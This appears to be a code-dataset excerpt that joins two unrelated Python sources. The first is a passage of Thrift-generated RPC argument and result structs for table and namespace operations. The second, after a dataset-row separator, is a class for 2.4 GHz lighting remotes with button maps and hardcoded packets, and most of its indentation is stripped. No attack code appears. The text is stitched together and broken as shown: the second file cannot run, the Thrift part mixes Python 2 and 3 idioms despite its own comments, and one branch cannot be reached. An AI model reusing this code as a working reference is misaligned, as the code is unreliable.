      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_listing_args:
  """
  Thrift argument struct for get_listing.

  Attributes:
   - ns: namespace handle (field 1, I64)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
  )

  def __init__(self, ns=None,):
    self.ns = ns

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_listing_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_listing_result:
  """
  Thrift result struct for get_listing.

  Attributes:
   - success: return value, list of NamespaceListing (field 0, LIST<STRUCT>)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(NamespaceListing, NamespaceListing.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype196, _size193) = iprot.readListBegin()
          # range (not Py2-only xrange) keeps this working on Python 3.
          for _i197 in range(_size193):
            _elem198 = NamespaceListing()
            _elem198.read(iprot)
            self.success.append(_elem198)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_listing_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter199 in self.success:
        iter199.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_table_splits_args:
  """
  Thrift-generated argument struct for the get_table_splits RPC.
  Attributes:
   - ns
   - table_name
  """

  # Per-field wire spec: (field id, type, name, type args, default); index 0 unused.
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
  )

  def __init__(self, ns=None, table_name=None,):
    self.ns = ns
    self.table_name = table_name

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_table_splits_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_table_splits_result:
  """
  Thrift-generated result struct for the get_table_splits RPC.
  Attributes:
   - success
   - e
  """

  # Per-field wire spec: (field id, type, name, type args, default).
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(TableSplit, TableSplit.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype203, _size200) = iprot.readListBegin()
          for _i204 in xrange(_size200):
            _elem205 = TableSplit()
            _elem205.read(iprot)
            self.success.append(_elem205)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_table_splits_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter206 in self.success:
        iter206.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class drop_namespace_args:
  """
  Thrift-generated argument struct for the drop_namespace RPC.
  Attributes:
   - ns
   - if_exists
  """

  # Per-field wire spec; note if_exists carries a default of True (spec slot 4).
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'ns', None, None, ), # 1
    (2, TType.BOOL, 'if_exists', None, True, ), # 2
  )

  def __init__(self, ns=None, if_exists=thrift_spec[2][4],):
    self.ns = ns
    self.if_exists = if_exists

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.ns = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.BOOL:
          self.if_exists = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('drop_namespace_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.STRING, 1)
      oprot.writeString(self.ns)
      oprot.writeFieldEnd()
    if self.if_exists != None:
      oprot.writeFieldBegin('if_exists', TType.BOOL, 2)
      oprot.writeBool(self.if_exists)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class drop_namespace_result:
  """
  Thrift-generated result struct for the drop_namespace RPC (void return, optional exception).
  Attributes:
   - e
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, e=None,):
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('drop_namespace_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class rename_table_args:
  """
  Thrift-generated argument struct for the rename_table RPC.
  Attributes:
   - ns
   - name
   - new_name
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
    (3, TType.STRING, 'new_name', None, None, ), # 3
  )

  def __init__(self, ns=None, name=None, new_name=None,):
    self.ns = ns
    self.name = name
    self.new_name = new_name

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.new_name = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('rename_table_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name != None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.new_name != None:
      oprot.writeFieldBegin('new_name', TType.STRING, 3)
      oprot.writeString(self.new_name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class rename_table_result:
  """
  Thrift-generated result struct for the rename_table RPC (void return, optional exception).
  Attributes:
   - e
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, e=None,):
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('rename_table_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class drop_table_args:
  """
  Thrift-generated argument struct for the drop_table RPC.
  Attributes:
   - ns
   - name
   - if_exists
  """

  # Per-field wire spec; note if_exists carries a default of True (spec slot 4).
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
    (3, TType.BOOL, 'if_exists', None, True, ), # 3
  )

  def __init__(self, ns=None, name=None, if_exists=thrift_spec[3][4],):
    self.ns = ns
    self.name = name
    self.if_exists = if_exists

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.if_exists = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('drop_table_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name != None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.if_exists != None:
      oprot.writeFieldBegin('if_exists', TType.BOOL, 3)
      oprot.writeBool(self.if_exists)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class drop_table_result:
  """
  Thrift-generated result struct for the drop_table RPC (void return, optional exception).
  Attributes:
   - e
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, e=None,):
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from *iprot*, using the accelerated C codec when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('drop_table_result')
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no field validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
| StarcoderdataPython |
1975676 | <gh_stars>0
#! /usr/bin/env python3
import random
import time
class Remote:
_remote_type_alias_map = {
'fut089': 'rgbcct'
}
_remote_type_parameters_map = {
'rgbw': {
'retries': 10,
'delay': 0.1,
'channels': [9, 40, 71],
'syncword': [0x258B, 0x147A],
'zones': [1, 2, 3, 4],
'features': [
'can_set_brightness',
'has_brightness',
'has_white',
'has_night',
'has_color'
],
'brightness_range': [0, 25],
'button_map': {
'slider': 0x00,
'on': 0x01,
'white': 0x11,
'off': 0x02,
'night': 0x12,
'zone_on:1': 0x03,
'zone_on:2': 0x05,
'zone_on:3': 0x07,
'zone_on:4': 0x09,
'zone_white:1': 0x13,
'zone_white:2': 0x15,
'zone_white:3': 0x17,
'zone_white:4': 0x19,
'zone_off:1': 0x04,
'zone_off:2': 0x06,
'zone_off:3': 0x08,
'zone_off:4': 0x0A,
'zone_night:1': 0x14,
'zone_night:2': 0x16,
'zone_night:3': 0x18,
'zone_night:4': 0x1A,
'speed_up': 0x0B,
'speed_down': 0x0C,
'change_color_mode': 0x0D,
'zone_set_brightness': 0x0E,
'zone_set_color': 0x0F
}
},
'cct': {
'retries': 3,
'delay': 0.11,
'channels': [4, 39, 74],
'syncword': [0x55AA, 0x050A],
'brightness_range': [0, 9],
'temperature_output_range': [0, 9],
'temperature_input_range': [6500, 3000],
'zones': [1, 2, 3, 4],
'features': [
'has_max_brightness',
'has_brightness',
'has_temperature',
'has_night',
'is_white'
],
'button_map': {
'on': 0x05,
'off': 0x09,
'max': 0x15,
'night': 0x19,
'zone_on:1': 0x08,
'zone_on:2': 0x0D,
'zone_on:3': 0x07,
'zone_on:4': 0x02,
'zone_max:1': 0x18,
'zone_max:2': 0x1D,
'zone_max:3': 0x17,
'zone_max:4': 0x12,
'zone_off:1': 0x0B,
'zone_off:2': 0x03,
'zone_off:3': 0x0A,
'zone_off:4': 0x06,
'zone_night:1': 0x1B,
'zone_night:2': 0x13,
'zone_night:3': 0x1A,
'zone_night:4': 0x16,
'brightness_up': 0x0C,
'brightness_down': 0x04,
'temperature_up': 0x0E,
'temperature_down': 0x0F
}
},
'lyh_cct': {
'retries': 70,
'delay': 0.2,
'channels': [24],
'syncword': [0x6F67, 0xA118],
'message_length': 13,
'format_config': {
'crc_enabled': 0,
'packet_length_encoded': 0,
'auto_ack': 1,
'auto_term_tx': 0
},
'brightness_range': [0, 9],
'temperature_output_range': [0, 9],
'temperature_input_range': [6500, 3000],
'zones': [1, 2, 3],
'features': [
'has_brightness',
'has_temperature',
'is_white'
],
'button_map': {
'on': 0x05,
'off': 0x09,
'max': 0x15,
'night': 0x19,
'zone_on:1': 0x08,
'zone_on:2': 0x0D,
'zone_on:3': 0x07,
'zone_on:4': 0x02,
'zone_max:1': 0x18,
'zone_max:2': 0x1D,
'zone_max:3': 0x17,
'zone_max:4': 0x12,
'zone_off:1': 0x0B,
'zone_off:2': 0x03,
'zone_off:3': 0x0A,
'zone_off:4': 0x06,
'zone_night:1': 0x1B,
'zone_night:2': 0x13,
'zone_night:3': 0x1A,
'zone_night:4': 0x16,
'brightness_up': 0x0C,
'brightness_down': 0x04,
'temperature_up': 0x0E,
'temperature_down': 0x0F
}
}
}
_remote_type_parameters_map_unimplemented = {
'rgbcct': {
'channels': [8, 39, 70],
'syncword': [0x1809, 0x7236]
},
'rgb': {
'channels': [3, 38, 73],
'syncword': [0xBCCD, 0x9AAB]
},
'fut020': {
'channels': [6, 41, 76],
'syncword': [0xAA55, 0x50A0]
}
}
def __init__(self, radio, remote_type, remote_id, message_id = None, config = None):
# Pull in the config for this remote type
self._config = self._get_type_parameters(remote_type)
self._config['radio_queue'] = '__DEFAULT__'
# Allow the user to specify some more parameters
if config is not None:
self._config.update(config)
# Store parameters
self._radio = radio
self._type = remote_type
self._id = remote_id
# Initialize the message ID for this remote
if message_id is None:
self._message_id = random.randint(0, 255)
else:
self._message_id = message_id
return None
def _scale_int(self, input_value, input_range_low, input_range_high, output_range_low, output_range_high):
input_range = input_range_high - input_range_low
output_range = output_range_high - output_range_low
input_value = input_value - input_range_low
output = input_value * (output_range / input_range)
output = output + output_range_low
output = int(output + 0.5)
return output
def _debug(self, message):
if 'debug_log_command' in self._config:
self._config['debug_log_command'](message)
return None
    def _get_type_parameters(self, remote_type):
        """Return the config dict for *remote_type* and bind its codec methods.

        Side effect: rebinds self._compute_button_message, self._parse_button_message,
        self.pair and self.unpair to the _<name>_<remote_type> implementations.
        Raises KeyError for unknown/unimplemented remote types.
        """
        config = {}
        # NOTE(review): update() is a shallow copy — nested dicts such as
        # button_map stay shared across all instances of the same type.
        config.update(self._remote_type_parameters_map[remote_type])
        # Supply default config values
        if 'retries' not in config:
            config['retries'] = 3
        if 'delay' not in config:
            config['delay'] = 0.1
        setattr(self, '_compute_button_message', getattr(self, '_compute_button_message_' + remote_type))
        setattr(self, '_parse_button_message', getattr(self, '_parse_button_message_' + remote_type))
        setattr(self, 'pair', getattr(self, '_pair_' + remote_type))
        setattr(self, 'unpair', getattr(self, '_unpair_' + remote_type))
        return config
def _compute_button_and_zone_from_button_id(self, button_id):
button_info = {}
button_info['button'] = 'unknown=' + str(button_id)
for button_name, button_value in self._config['button_map'].items():
if button_value == button_id:
button_info['button'] = button_name
break
# If the button name has a zone, split it out into its own parameter
if button_info['button'].find(':') != -1:
button_name_zone = button_info['button'].split(':')
button_info['button'] = button_name_zone[0]
button_info['zone'] = int(button_name_zone[1])
return button_info
def _compute_button_message_lyh_cct(self, button_info):
# XXX: This protocol has not been completely reversed yet
if 'zone' in button_info:
if button_info['zone'] is None:
del button_info['zone']
message_id = button_info['message_id']
retval = None
if button_info['button'] == 'on' and 'zone' not in button_info:
if 'zone' not in button_info:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x66, 0x01, 0x59, 0xad, 0x07]
elif button_info['zone'] == 1:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x68, 0x00, 0x67, 0x01, 0xd3, 0xff, 0x46]
elif button_info['zone'] == 2:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0x31, 0x69, 0x80, 0x67, 0x01, 0xd4, 0xc8, 0x11]
elif button_info['zone'] == 3:
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0x31, 0x6a, 0x00, 0x68, 0x81, 0x55, 0xe0, 0x72]
if button_info['button'] == 'off':
if 'zone' not in button_info:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x66, 0x01, 0xd2, 0xf6, 0x46]
elif button_info['zone'] == 1:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0xb1, 0x68, 0x80, 0x68, 0x01, 0x4d, 0x4f, 0x0a]
elif button_info['zone'] == 2:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0x31, 0x69, 0x00, 0x69, 0x01, 0x4e, 0x80, 0x41]
elif button_info['zone'] == 3:
retval = [0x05, 0xb0, 0x80, 0x88, 0x91, 0x31, 0x6a, 0x80, 0x69, 0x81, 0xcf, 0x6f, 0x68]
if button_info['button'] == 'brightness_up':
if message_id % 2 == 0:
retval = [0x05, 0xb3, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x39, 0x81, 0xa7, 0x33, 0x7e]
else:
retval = [0x05, 0xb3, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x3c, 0x81, 0x2a, 0x63, 0x18]
if button_info['button'] == 'brightness_down':
if message_id % 2 == 0:
retval = [0x85, 0xb2, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x3d, 0x01, 0x2b, 0xc6, 0x61]
else:
